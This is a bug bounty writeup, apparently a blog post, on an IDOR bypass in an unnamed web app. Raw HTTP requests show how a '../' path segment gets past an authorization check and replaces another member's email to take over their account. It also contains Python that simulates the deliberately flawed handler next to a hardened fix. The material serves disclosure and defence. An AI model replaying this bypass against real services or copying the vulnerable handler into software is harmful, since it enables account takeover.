Account Takeover Worth of $2500

Jefferson Gonzales (Gonz)
Nov 16, 2022

$ whoami

I’m Jefferson Gonzales, you can call me Gonz for short. I am 18 years old, a first-year college student and a part-time security researcher from the Philippines.

Acknowledged by Nokia, UN, BBC and 20+ companies.

In this writeup I will share how I earned $2500 for a simple IDOR bypass that led to account takeover.

After my graduation from Senior High School I had a one-month break, and I used that free time to hunt and focus on a single program.

Since I cannot disclose the program’s name, I will refer to it as redacted.com in accordance with their disclosure policy.

On redacted.com you can create an Organization and add members to it. There are two ways to add a member to an Organization.

First, you can add a member by inviting them using their email address.

Second, you can add a member without an email, using only the member’s name; this is called a Demo user. After adding a Demo user you can edit it and add an email address to turn it into an actual user.

Adding member using email address
Adding member by providing name (Demo User)

After creating a Demo user, I added an email address to make it an actual user in my Organization. When I went to my Burp Suite request history, I noticed this request:

POST /<organizationID>/addEmail/<DemoUserID>/ HTTP/2
Host: redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: application/json
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/json
Token: 123abc
Content-Length: 40
Origin: https://redacted.com
Referer: https://redacted.com/

{
"email":"attacker@email.com"
}

What happens if I change <DemoUserID> to the UserID of any other member of my Organization?

The answer is:

HTTP/2 403 Forbidden
Date: Tue, 15 Nov 2022 14:44:25 GMT
Content-Type: application/json
Content-Length: 76
Pragma: no-cache
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
X-Content-Type-Options: nosniff

{
"message":"You don't have access to this.",
}

After hours of searching for a bypass I found a working one. The final bypass request looked like this:

POST /<organizationID>/addEmail/<DemoUserID>/../<UserID>/ HTTP/2
Host: redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: application/json
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/json
Token: 123abc
Content-Length: 40
Origin: https://redacted.com
Referer: https://redacted.com/

{
"email":"attacker@email.com"
}

Response to the request:

HTTP/2 200 OK
Date: Tue, 15 Nov 2022 14:43:32 GMT
Content-Type: application/json
Content-Length: 2
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
X-Content-Type-Options: nosniff

{
}

The email address of the account identified by <UserID> is replaced with the attacker-controlled address, which is what makes the account takeover possible.
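One plausible root cause for a bypass of this shape, assumed here rather than stated in the writeup, is that the component performing the authorization check reads the user ID from the raw request path while the component performing the write sees the path after dot-segment normalization, so the two disagree about which user is being edited. The Python below is an added example, not the program's code: it simulates that mismatch on constructed sample data (organization `org1`, demo user `demo9`, real member `alice`) and shows a hardened handler that normalizes first, refuses any path that changes under normalization, and authorizes against the resolved ID.

```python
import posixpath
import re

# Constructed sample data (not from the writeup): one organization with a
# real member (alice) and a demo user (demo9) that has no email yet.
def make_users():
    return {
        "demo9": {"org": "org1", "demo": True, "email": None},
        "alice": {"org": "org1", "demo": False, "email": "alice@example.com"},
    }

ROUTE = re.compile(r"^/(?P<org>[^/]+)/addEmail/(?P<user>[^/]+)/$")

def may_add_email(users, org, user_id):
    """Assumed rule: an email may only be attached to a demo user of the org."""
    u = users.get(user_id)
    return u is not None and u["org"] == org and u["demo"]

def normalize(path):
    """Dot-segment removal as a web server or framework applies it (RFC 3986 5.2.4)."""
    p = posixpath.normpath(path)
    return p + "/" if path.endswith("/") and not p.endswith("/") else p

def vulnerable_add_email(users, raw_path, email):
    """Flaw: the authz layer parses the raw path, the handler the normalized one."""
    segs = raw_path.split("/")
    if len(segs) < 5 or segs[2] != "addEmail":
        return 404
    if not may_add_email(users, segs[1], segs[3]):        # checks <DemoUserID>
        return 403
    target = normalize(raw_path).rstrip("/").split("/")[-1]  # writes <UserID>
    if target not in users:
        return 404
    users[target]["email"] = email
    users[target]["demo"] = False   # a demo user with an email becomes a real user
    return 200

def hardened_add_email(users, raw_path, email):
    """Fix: normalize first, refuse paths that change, authorize the resolved id."""
    if normalize(raw_path) != raw_path:
        return 400
    m = ROUTE.match(raw_path)
    if not m:
        return 404
    if not may_add_email(users, m["org"], m["user"]):
        return 403
    users[m["user"]]["email"] = email
    users[m["user"]]["demo"] = False
    return 200
```

Real deployments may also percent-decode `%2e%2e` or translate backslashes before normalizing, so the comparison must run on the path exactly as the write-performing handler will see it, after the same decoding. Logging a 400 for every request whose path changes under normalization gives the SOC a cheap detection signal for this probing.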

Report Time:

I discovered the vulnerability around 10 p.m. and immediately filed a report. The next morning I received a response from the team.

Bounty time

Thank you for reading this writeup.

You can contact me on

Twitter: @gonzxph

LinkedIn: @gonzxph
